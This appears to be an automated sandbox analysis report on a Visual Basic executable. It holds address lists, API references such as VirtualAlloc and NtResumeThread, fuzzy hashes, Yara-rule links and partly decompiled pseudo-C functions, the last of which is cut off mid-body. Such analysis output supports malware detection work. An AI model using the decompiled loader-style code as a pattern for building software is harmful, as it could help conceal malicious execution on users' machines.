0x0040212f
0x00402131
0x00402133
0x00402135
0x00402137
0x00402139
0x0040213b
0x0040213d
0x0040213f
0x00402141
0x00402143
0x00402145
0x00402147
0x00402149
0x0040214f
0x00402153
0x0040215a
0x0040215b
0x00402161
0x00402163
0x00402165
0x00402167
0x00402169
0x0040216b
0x0040216d
0x0040216f
0x00402171
0x00402173
0x00402175
0x00402177
0x00402179
0x0040217b
0x0040217d
0x0040217f
0x00402181
0x00402183
0x00402185
0x00402187
0x00402189
0x0040218b
0x0040218d
0x0040218f
0x00402191
0x00402193
0x00402195
0x00402197
0x00402199
0x0040219b
0x0040219d
0x0040219f
0x004021a1
0x004021a3
0x004021a5
0x004021a7
0x004021a9
0x004021ab
0x004021af
0x004021b6
0x004021b7
0x004021bd
0x004021bf
0x004021c1
0x004021c3
0x004021c5
0x004021c7
0x004021c9
0x004021cb
0x004021cd
0x004021cf
0x004021d1
0x004021d3
0x004021d5
0x004021d7
0x004021d9
0x004021db
0x004021dd
0x004021df
0x004021e1
0x004021e3
0x004021e5
0x004021e7
0x004021e9
0x004021eb
0x004021ed
0x004021ef
0x004021f1
0x004021f3
0x004021f5
0x004021f7
0x004021f9
0x004021fb
0x004021fd
0x004021ff
0x00402201
0x00402203
0x00402205
0x00402207
0x00402209
0x0040220b
0x0040220d
0x0040220f
0x00402211
0x00402213
0x00402215
0x00402217
0x00402219
0x0040221b
0x00402221
0x00402223
0x00402287
0x00402289
0x0040228b
0x0040228d
0x0040228e
0x0040e52e
0x0040e530
0x0040e538
0x0040e53f
0x0040e546
0x0040e54b
0x0040e553
0x0040e556
0x0040e55d
0x0040e567
0x0040e56c
0x0040e56f
0x0040e576
0x0040e57d
0x0040e583
0x0040e588
0x0040e58b
0x0040e58c
0x0040e58f
0x0040e590
0x0040e595
0x0040e59c
0x0040e5a3
0x0040e5a6
0x0040e5a7
0x0040e5aa
0x0040e5ab
0x0040e5b0
0x0040e5b7
0x0040e5ba
0x0040e5bb
0x0040e5be
0x0040e5bf
0x0040e5c1
0x0040e5c6
0x0040e5c9
0x0040e5d0
0x0040e5d2
0x0040e5d8
0x0040e5df
0x0040e5fc
0x0040e5e1
0x0040e5e1
0x0040e5e6
0x0040e5eb
0x0040e5f0
0x0040e5f0
0x0040e60c
0x0040e60e
0x0040e614
0x0040e618
0x0040e61e
0x0040e622
0x0040e62e
0x0040e636
0x0040e639
0x0040e63b
0x0040e641
0x0040e648
0x0040e66a
0x0040e66a
0x0040e66a
0x0040e64a
0x0040e64a
0x0040e64c
0x0040e651
0x0040e657
0x0040e65d
0x0040e662
0x0040e662
0x0040e674
0x0040e674
0x0040e679
0x0040e680
0x0040e687
0x0040e6b0
0x0040e6b5
0x00401838
0x00401838
0x0040183d
0x00000000
0x0040183f
0x0040183f
0x00401845
0x00401847
0x00401849
0x0040184b
0x0040184d
0x0040184f
0x00401851
0x00401853
0x00401855
0x00401857
0x0040185d
0x0040185f
0x00401861
0x00000000
0x00401861
0x0040183d
0x00401836
0x0040182b
0x00401828
0x00401826
0x0040181e
0x0040181c

APIs

#100.MSVBVM60(VB5!6&*), ref: 004015B9

Strings

VB5!6&*, xrefs: 0040179C, 004015B4

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: b9156ab231b7352f11881fa1cb19477b3bfaaf2da8e941ff17f15855002c7c1e
Instruction ID: 52d8bc51655257e38eafef4e2c17394f9c6c1b0e5f6e1be7d007e19db2c79f44
Opcode Fuzzy Hash: b9156ab231b7352f11881fa1cb19477b3bfaaf2da8e941ff17f15855002c7c1e
Instruction Fuzzy Hash: C671776244E7C05FD3078B709D696A27FB0EE2362471A4AEBC8C1CF1B3D15D685AC722

Uniqueness

Uniqueness Score: -1.00%

Function 022B3BC4, Relevance: 1.6, APIs: 1, Instructions: 96nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 022B3CAA

Memory Dump Source

Source File: 00000000.00000002.323977009.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1022ef9ac483e6118be7cd8111201d5669db4bd9a92a41a9184ca48208d0f75d
Instruction ID: ca121f0934a2763d8272d4444d88815990fbb7917f1e887487b8b199ecab2574
Opcode Fuzzy Hash: 1022ef9ac483e6118be7cd8111201d5669db4bd9a92a41a9184ca48208d0f75d
Instruction Fuzzy Hash: 63310530711B078EFB1ADEB8C9683EA3292AF453A6F5852BCDC56860E9D779C4C4C700

Uniqueness

Uniqueness Score: -1.00%

Function 0040E313, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0040E313(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				char _v40;
				char _v56;
				char _v72;
				char* _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				char _v120;
				void* _v124;
				signed int _v128;
				signed int _v132;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _t65;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				short _t77;
				signed int _t81;
				intOrPtr _t100;

				_push(0x4013b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t100;
				L004013B0();
				_v12 = _t100;
				_v8 = 0x4012b0;
				L00401506();
				_push(2);
				_push(_v32);
				L004014A0();
				L00401548();
				_push(0x80);
				_push(0x402f44);
				L004014AC();
				asm("sbb eax, eax");
				_v128 =  ~( ~( ~0x80));
				L00401512();
				if(_v128 != 0) {
					_t81 =  *((intOrPtr*)( *_a4 + 0x710))(_a4);
					_v128 = _t81;
					if(_v128 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x710);
						_push(0x4024e8);
						_push(_a4);
						_push(_v128);
						L00401596();
						_v140 = _t81;
					}
				}
				_v96 = L"01/01/01";
				_v104 = 8;
				L004014D6();
				_push( &_v56);
				_push( &_v72); // executed
				L0040149A(); // executed
				_v112 = 0x7d1;
				_v120 = 0x8002;
				_push( &_v72);
				_t65 =  &_v120;
				_push(_t65);
				L004014E2();
				_v128 = _t65;
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L00401536();
				_t68 = _v128;
				if(_t68 != 0) {
					_push(0xf4);
					L00401494();
					_v28 = _t68;
				}
				if( *0x410010 != 0) {
					_v144 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x401d7c);
					L0040156C();
					_v144 = 0x410010;
				}
				_t72 =  &_v40;
				L00401572();
				_v128 = _t72;
				_t76 =  *((intOrPtr*)( *_v128 + 0x98))(_v128,  &_v124, _t72,  *((intOrPtr*)( *((intOrPtr*)( *_v144)) + 0x300))( *_v144));
				asm("fclex");
				_v132 = _t76;
				if(_v132 >= 0) {
					_v148 = _v148 & 0x00000000;
				} else {
					_push(0x98);
					_push(0x402d74);
					_push(_v128);
					_push(_v132);
					L00401596();
					_v148 = _t76;
				}
				_t77 = _v124;
				_v24 = _t77;
				L0040154E();
				_push(0x40e510);
				L00401512();
				return _t77;
			}

0x0040e318
0x0040e323
0x0040e324
0x0040e330
0x0040e338
0x0040e33b
0x0040e34a
0x0040e34f
0x0040e351
0x0040e354
0x0040e35e
0x0040e363
0x0040e364
0x0040e369
0x0040e370
0x0040e376
0x0040e37d
0x0040e388
0x0040e392
0x0040e398
0x0040e39f
0x0040e3be
0x0040e3a1
0x0040e3a1
0x0040e3a6
0x0040e3ab
0x0040e3ae
0x0040e3b1
0x0040e3b6
0x0040e3b6
0x0040e39f
0x0040e3c5
0x0040e3cc
0x0040e3d9
0x0040e3e1
0x0040e3e5
0x0040e3e6
0x0040e3eb
0x0040e3f2
0x0040e3fc
0x0040e3fd
0x0040e400
0x0040e401
0x0040e406
0x0040e40d
0x0040e411
0x0040e412
0x0040e414
0x0040e41c
0x0040e422
0x0040e424
0x0040e429
0x0040e431
0x0040e431
0x0040e43b
0x0040e458
0x0040e43d
0x0040e43d
0x0040e442
0x0040e447
0x0040e44c
0x0040e44c
0x0040e47c
0x0040e480
0x0040e485
0x0040e494
0x0040e49a
0x0040e49c
0x0040e4a3
0x0040e4c2
0x0040e4a5
0x0040e4a5
0x0040e4aa
0x0040e4af
0x0040e4b2
0x0040e4b5
0x0040e4ba
0x0040e4ba
0x0040e4c9
0x0040e4cd
0x0040e4d4
0x0040e4d9
0x0040e50a
0x0040e50f

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040E330
__vbaStrCopy.MSVBVM60(?,?,?,?,004013B6), ref: 0040E34A
#514.MSVBVM60(?,00000002,?,?,?,?,004013B6), ref: 0040E354
__vbaStrMove.MSVBVM60(?,00000002,?,?,?,?,004013B6), ref: 0040E35E
__vbaStrCmp.MSVBVM60(00402F44,00000000,?,00000002,?,?,?,?,004013B6), ref: 0040E369
__vbaFreeStr.MSVBVM60(00402F44,00000000,?,00000002,?,?,?,?,004013B6), ref: 0040E37D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004024E8,00000710), ref: 0040E3B1
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00402F44,00000000), ref: 0040E3D9
#553.MSVBVM60(?,?), ref: 0040E3E6
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 0040E401
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0040E414
#571.MSVBVM60(000000F4), ref: 0040E429
__vbaNew2.MSVBVM60(00401D7C,00410010), ref: 0040E447
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E480
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D74,00000098), ref: 0040E4B5
__vbaFreeObj.MSVBVM60(00000000,?,00402D74,00000098), ref: 0040E4D4
__vbaFreeStr.MSVBVM60(0040E510), ref: 0040E50A

Strings

01/01/01, xrefs: 0040E3C5
var, xrefs: 0040E342

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#514#553#571ChkstkCopyListMoveNew2
String ID: 01/01/01$var
API String ID: 906154947-1125586504
Opcode ID: db890647ae79dda5c874f674156e56d57a6a395e1777c85704693edb61809a08
Instruction ID: 95d2ce6e09ff168c4e42eb58ec4ddb2ad2c266d8bf28ca53212bc07b89429b23
Opcode Fuzzy Hash: db890647ae79dda5c874f674156e56d57a6a395e1777c85704693edb61809a08
Instruction Fuzzy Hash: 2A510B70D00208ABDB20DFA2C945BEDB7B8BF08704F20857AF515BB1E1DBB85A459F58

Uniqueness

Uniqueness Score: -1.00%

Function 00408314, Relevance: 16.8, APIs: 11, Instructions: 266
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00408314(signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				long long _v32;
				intOrPtr _v40;
				long long _v44;
				short _v64;
				short _v68;
				long long _v84;
				intOrPtr _v88;
				long long _v92;
				long long _v100;
				char _v124;
				short _v128;
				char _v144;
				short _v152;
				intOrPtr _v160;
				intOrPtr _v168;
				long long _v172;
				char _v228;
				intOrPtr _v284;
				char _v292;
				void* _v360;
				char _v364;
				intOrPtr _v380;
				long long _v384;
				signed int _v388;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _t191;
				signed int _t194;
				signed int _t216;
				signed int _t221;
				signed int _t225;
				signed int _t239;
				char* _t244;
				signed int _t257;
				void* _t275;
				void* _t278;
				void* _t279;
				intOrPtr _t281;

				 *[fs:0x0] = _t281;
				L004013B0();
				_v16 = _t281;
				_v12 = 0x401218;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, _t278, _t279, _t275,  *[fs:0x0], 0x4013b6);
				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v384);
				_v44 = _v384;
				_v40 = _v380;
				_t191 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v388 = _t191;
				if(_v388 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x4024e8);
					_push(_a4);
					_push(_v388);
					L00401596();
					_v452 = _t191;
				}
				_t194 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4);
				_v388 = _t194;
				if(_v388 >= 0) {
					_v456 = _v456 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x4024e8);
					_push(_a4);
					_push(_v388);
					L00401596();
					_v456 = _t194;
				}
				 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v384);
				_v100 = _v384;
				 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v364);
				_v144 = _v364;
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v384);
				_v32 = _v384;
				 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v360);
				_v128 = _v360;
				_t216 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v384);
				_v388 = _t216;
				if(_v388 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x4024e8);
					_push(_a4);
					_push(_v388);
					L00401596();
					_v460 = _t216;
				}
				_v92 = _v384;
				_v88 = _v380;
				_t221 =  *((intOrPtr*)( *_a4 + 0x704))(_a4);
				_v388 = _t221;
				if(_v388 >= 0) {
					_v464 = _v464 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x4024e8);
					_push(_a4);
					_push(_v388);
					L00401596();
					_v464 = _t221;
				}
				_t225 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v384);
				_v388 = _t225;
				if(_v388 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x4024e8);
					_push(_a4);
					_push(_v388);
					L00401596();
					_v468 = _t225;
				}
				_v172 = _v384;
				_v168 = _v380;
				 *((intOrPtr*)( *_a4 + 0x728))(_a4);
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4);
				 *((intOrPtr*)( *_a4 + 0x730))(_a4);
				_t239 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
				asm("fclex");
				_v388 = _t239;
				if(_v388 >= 0) {
					_v472 = _v472 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x4024b8);
					_push(_a4);
					_push(_v388);
					L00401596();
					_v472 = _t239;
				}
				while(1) {
					_v284 = 1;
					_v292 = 2;
					_push( &_v124);
					_push( &_v292);
					_push( &_v228);
					L0040158A();
					L00401590();
					_v284 = 0x2ffff;
					_v292 = 0x8003;
					_push( &_v124);
					_t244 =  &_v292;
					_push(_t244);
					L00401584();
					if(_t244 == 0) {
						break;
					}
				}
				 *((intOrPtr*)( *_a4 + 0x734))(_a4,  &_v364);
				_v160 = _v364;
				 *((intOrPtr*)( *_a4 + 0x738))(_a4,  &_v360);
				_v68 = _v360;
				_t257 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4);
				_v388 = _t257;
				if(_v388 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x4024e8);
					_push(_a4);
					_push(_v388);
					L00401596();
					_v476 = _t257;
				}
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4);
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v384);
				_v84 = _v384;
				 *((intOrPtr*)( *_a4 + 0x744))(_a4,  &_v360);
				_v152 = _v360;
				 *((intOrPtr*)( *_a4 + 0x748))(_a4,  &_v360);
				_v64 = _v360;
				_push(0x407267);
				goto ( *__esp);
			}

0x00408326
0x00408332
0x0040833a
0x0040833d
0x0040834a
0x00408353
0x0040835e
0x00408370
0x0040837c
0x00408385
0x00408390
0x00408396
0x004083a3
0x004083c5
0x004083a5
0x004083a5
0x004083aa
0x004083af
0x004083b2
0x004083b8
0x004083bd
0x004083bd
0x004083d4
0x004083da
0x004083e7
0x00408409
0x004083e9
0x004083e9
0x004083ee
0x004083f3
0x004083f6
0x004083fc
0x00408401
0x00408401
0x0040841f
0x0040842b
0x0040843d
0x00408449
0x0040845e
0x0040846a
0x0040847c
0x00408489
0x0040849c
0x004084a2
0x004084af
0x004084d1
0x004084b1
0x004084b1
0x004084b6
0x004084bb
0x004084be
0x004084c4
0x004084c9
0x004084c9
0x004084de
0x004084e7
0x004084f2
0x004084f8
0x00408505
0x00408527
0x00408507
0x00408507
0x0040850c
0x00408511
0x00408514
0x0040851a
0x0040851f
0x0040851f
0x0040853d
0x00408543
0x00408550
0x00408572
0x00408552
0x00408552
0x00408557
0x0040855c
0x0040855f
0x00408565
0x0040856a
0x0040856a
0x0040857f
0x0040858b
0x00408599
0x004085a7
0x004085b5
0x004085c3
0x004085c9
0x004085cb
0x004085d8
0x004085fa
0x004085da
0x004085da
0x004085df
0x004085e4
0x004085e7
0x004085ed
0x004085f2
0x004085f2
0x00408601
0x00408601
0x0040860b
0x00408618
0x0040861f
0x00408626
0x00408627
0x00408631
0x00408636
0x00408640
0x0040864d
0x0040864e
0x00408654
0x00408655
0x0040865f
0x00000000
0x00000000
0x00408661
0x00408672
0x0040867e
0x00408693
0x004086a0
0x004086ac
0x004086b2
0x004086bf
0x004086e1
0x004086c1
0x004086c1
0x004086c6
0x004086cb
0x004086ce
0x004086d4
0x004086d9
0x004086d9
0x004086f0
0x00408705
0x00408711
0x00408723
0x00408730
0x00408746
0x00408753
0x0040875c
0x0040875d

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 00408332
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024E8,000006F8), ref: 004083B8
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024E8,000006FC), ref: 004083FC
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024E8,00000700), ref: 004084C4
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024E8,00000704), ref: 0040851A
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024E8,00000708), ref: 00408565
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B8,000002B4), ref: 004085ED
__vbaVarAdd.MSVBVM60(?,00000002,?), ref: 00408627
__vbaVarMove.MSVBVM60(?,00000002,?), ref: 00408631
__vbaVarTstLt.MSVBVM60(00008003,?,?,00000002,?), ref: 00408655
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024E8,0000070C), ref: 004086D4

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$ChkstkMove
String ID:
API String ID: 348479110-0
Opcode ID: 600b312f099f50227f507cf3bb3aa268a0a4e3ee861db13bc66fc224462c6d85
Instruction ID: d432c8542eab3f2b32ec4203e8bda541b1eacbe0a0f98b5d7e92291e31c9c319
Opcode Fuzzy Hash: 600b312f099f50227f507cf3bb3aa268a0a4e3ee861db13bc66fc224462c6d85
Instruction Fuzzy Hash: 35D19F74900218EFDB51DF54CD88BD97BB4FF08351F0081EAF849AB261DB35AA959F84

Uniqueness

Uniqueness Score: -1.00%

Function 004075BF, Relevance: 1.4, APIs: 1, Instructions: 174memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000001,00009000,00000553,-00000052), ref: 0040773D

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2e6d52d6c333bbf70a4984c10a1005dadc3275d86c39cdcdb254c8b0b9e70e5f
Instruction ID: c81491e244032f3d842632b72096b0a4b43262c1ba1bf85ab02a91e6aa8d3f75
Opcode Fuzzy Hash: 2e6d52d6c333bbf70a4984c10a1005dadc3275d86c39cdcdb254c8b0b9e70e5f
Instruction Fuzzy Hash: EA415B03F0D39285FB322174C9E85AC7A13CB92350F36C6BBD89A2B8C6457E19C65697

Uniqueness

Uniqueness Score: -1.00%

Function 004076B7, Relevance: 1.4, APIs: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000001,00009000,00000553,-00000052), ref: 0040773D

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 78a0737786c2c012dd332589d0ba29c40b42d04c68fb82ddb02f4bff3baadbf6
Instruction ID: 8ae72026e043a3ce023cd812df26e7cdb9a55c00b9495436e429b677617a4699
Opcode Fuzzy Hash: 78a0737786c2c012dd332589d0ba29c40b42d04c68fb82ddb02f4bff3baadbf6
Instruction Fuzzy Hash: EA216A53F0872285FF713168CAC85AD6103CB82345F32C637CDAA338D85A7E5AC15A97

Uniqueness

Uniqueness Score: -1.00%

Function 0040772D, Relevance: 1.3, APIs: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000001,00009000,00000553,-00000052), ref: 0040773D

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 81cc1ac04af0384b85253f7ed0a6c5c39b039c28cc893b6b7accf936a323032d
Instruction ID: 8119047d206da649305390364a0d5355f720c669e84ecb6ac87ee43afee05792
Opcode Fuzzy Hash: 81cc1ac04af0384b85253f7ed0a6c5c39b039c28cc893b6b7accf936a323032d
Instruction Fuzzy Hash: BC119E42F0832285FF713168C5C85AC6503CB82300F72C237CDA9778C95A7E59C5569B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040EACD, Relevance: 56.3, APIs: 30, Strings: 2, Instructions: 328
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040EACD(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v36;
				char _v48;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v80;
				char _v88;
				char _v104;
				char _v112;
				intOrPtr _v120;
				char* _v144;
				char _v152;
				intOrPtr _v176;
				intOrPtr _v184;
				char _v204;
				char _v208;
				signed int _v212;
				signed int _v216;
				intOrPtr* _v220;
				signed int _v224;
				signed int _v228;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int* _v256;
				signed int _v260;
				signed int* _v264;
				signed int _v268;
				signed long long _v272;
				intOrPtr _v276;
				char* _v280;
				intOrPtr _v284;
				char _v288;
				signed int _v292;
				signed int _t144;
				signed int _t145;
				signed int _t155;
				signed int _t159;
				char* _t162;
				signed int _t166;
				signed int _t170;
				char* _t175;
				signed int _t179;
				signed char _t180;
				char* _t182;
				char* _t183;
				signed int _t186;
				void* _t208;
				intOrPtr _t219;
				void* _t220;
				intOrPtr* _t221;
				signed long long _t229;
				char* _t233;
				char* _t234;

				_push(0x4013b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t219;
				L004013B0();
				_v12 = _t219;
				_v8 = 0x401338;
				_push(5);
				_push(0x402fe8);
				_t144 =  &_v48;
				_push(_t144);
				L004014F4();
				_v212 = _v212 & 0x00000000;
				if(_v212 >= 2) {
					L004014EE();
					_v236 = _t144;
				} else {
					_v236 = _v236 & 0x00000000;
				}
				_t145 = _v212;
				 *((long long*)(_v36 + _t145 * 8)) =  *0x401278;
				_v212 = 1;
				__eflags = _v212 - 2;
				if(__eflags >= 0) {
					L004014EE();
					_v240 = _t145;
				} else {
					_v240 = _v240 & 0x00000000;
				}
				 *((long long*)(_v36 + _v212 * 8)) =  *0x401330;
				_v80 = 0x80020004;
				_v88 = 0xa;
				_v208 =  &_v48;
				_push( &_v88);
				_push( &_v208);
				L0040146A();
				L004014B8();
				asm("fcomp qword [0x401328]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags == 0) {
					_t30 =  &_v244;
					 *_t30 = _v244 & 0x00000000;
					__eflags =  *_t30;
				} else {
					_v244 = 1;
				}
				_v212 =  ~_v244;
				L0040155A();
				__eflags = _v212;
				if(_v212 != 0) {
					_v112 = _a4;
					_v120 = 9;
					_v144 = L"APRJTELAKERINGSVRKSTED";
					_v152 = 8;
					_v176 = 0x3af081;
					_v184 = 3;
					_push(0x10);
					L004013B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004013B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004013B0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"FBno18");
					_push(_v24);
					L0040151E();
					_t219 = _t219 + 0x3c;
				}
				_t155 =  *((intOrPtr*)( *_a4 + 0x114))(_a4, 1);
				asm("fclex");
				_v212 = _t155;
				__eflags = _v212;
				if(_v212 >= 0) {
					_t55 =  &_v248;
					 *_t55 = _v248 & 0x00000000;
					__eflags =  *_t55;
				} else {
					_push(0x114);
					_push(0x4024b8);
					_push(_a4);
					_push(_v212);
					L00401596();
					_v248 = _t155;
				}
				_t159 =  *((intOrPtr*)( *_a4 + 0x110))(_a4,  &_v204);
				asm("fclex");
				_v212 = _t159;
				__eflags = _v212;
				if(_v212 >= 0) {
					_t66 =  &_v252;
					 *_t66 = _v252 & 0x00000000;
					__eflags =  *_t66;
				} else {
					_push(0x110);
					_push(0x4024b8);
					_push(_a4);
					_push(_v212);
					L00401596();
					_v252 = _t159;
				}
				__eflags = _v204 - _v56;
				if(_v204 == _v56) {
					__eflags =  *0x410010;
					if( *0x410010 != 0) {
						_v256 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x401d7c);
						L0040156C();
						_v256 = 0x410010;
					}
					_t166 =  &_v60;
					L00401572();
					_v212 = _t166;
					_t170 =  *((intOrPtr*)( *_v212 + 0x100))(_v212,  &_v64, _t166,  *((intOrPtr*)( *( *_v256) + 0x2fc))( *_v256));
					asm("fclex");
					_v216 = _t170;
					__eflags = _v216;
					if(_v216 >= 0) {
						_t86 =  &_v260;
						 *_t86 = _v260 & 0x00000000;
						__eflags =  *_t86;
					} else {
						_push(0x100);
						_push(0x402d74);
						_push(_v212);
						_push(_v216);
						L00401596();
						_v260 = _t170;
					}
					_push(0);
					_push(0);
					_push(_v64);
					_push( &_v88);
					L00401578();
					_t220 = _t219 + 0x10;
					__eflags =  *0x410010;
					if( *0x410010 != 0) {
						_v264 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x401d7c);
						L0040156C();
						_v264 = 0x410010;
					}
					_t208 =  *( *_v264);
					_t175 =  &_v68;
					L00401572();
					_v220 = _t175;
					_t179 =  *((intOrPtr*)( *_v220 + 0x160))(_v220,  &_v72, _t175,  *((intOrPtr*)(_t208 + 0x2fc))( *_v264));
					asm("fclex");
					_v224 = _t179;
					__eflags = _v224;
					if(_v224 >= 0) {
						_t106 =  &_v268;
						 *_t106 = _v268 & 0x00000000;
						__eflags =  *_t106;
					} else {
						_push(0x160);
						_push(0x402d74);
						_push(_v220);
						_push(_v224);
						L00401596();
						_v268 = _t179;
					}
					_push(0);
					_push(0);
					_push(_v72);
					_t180 =  &_v104;
					_push(_t180);
					L00401578();
					_t221 = _t220 + 0x10;
					_push(_t208);
					_v112 =  *0x401320;
					_t229 =  *0x401318 *  *0x401208;
					__eflags =  *0x410000;
					if( *0x410000 != 0) {
						_push( *0x401204);
						_push( *0x401200);
						L004013D4();
					} else {
						_t229 = _t229 /  *0x401200;
					}
					asm("fnstsw ax");
					__eflags = _t180 & 0x0000000d;
					if((_t180 & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					}
					_v272 = _t229;
					 *_t221 = _v272;
					 *_t221 =  *0x401310;
					L00401554();
					_t233 =  *0x401300;
					 *_t221 = _t233;
					_t182 =  &_v104;
					L0040157E();
					_v276 = _t182;
					asm("fild dword [ebp-0x110]");
					_v280 = _t233;
					_t234 = _v280;
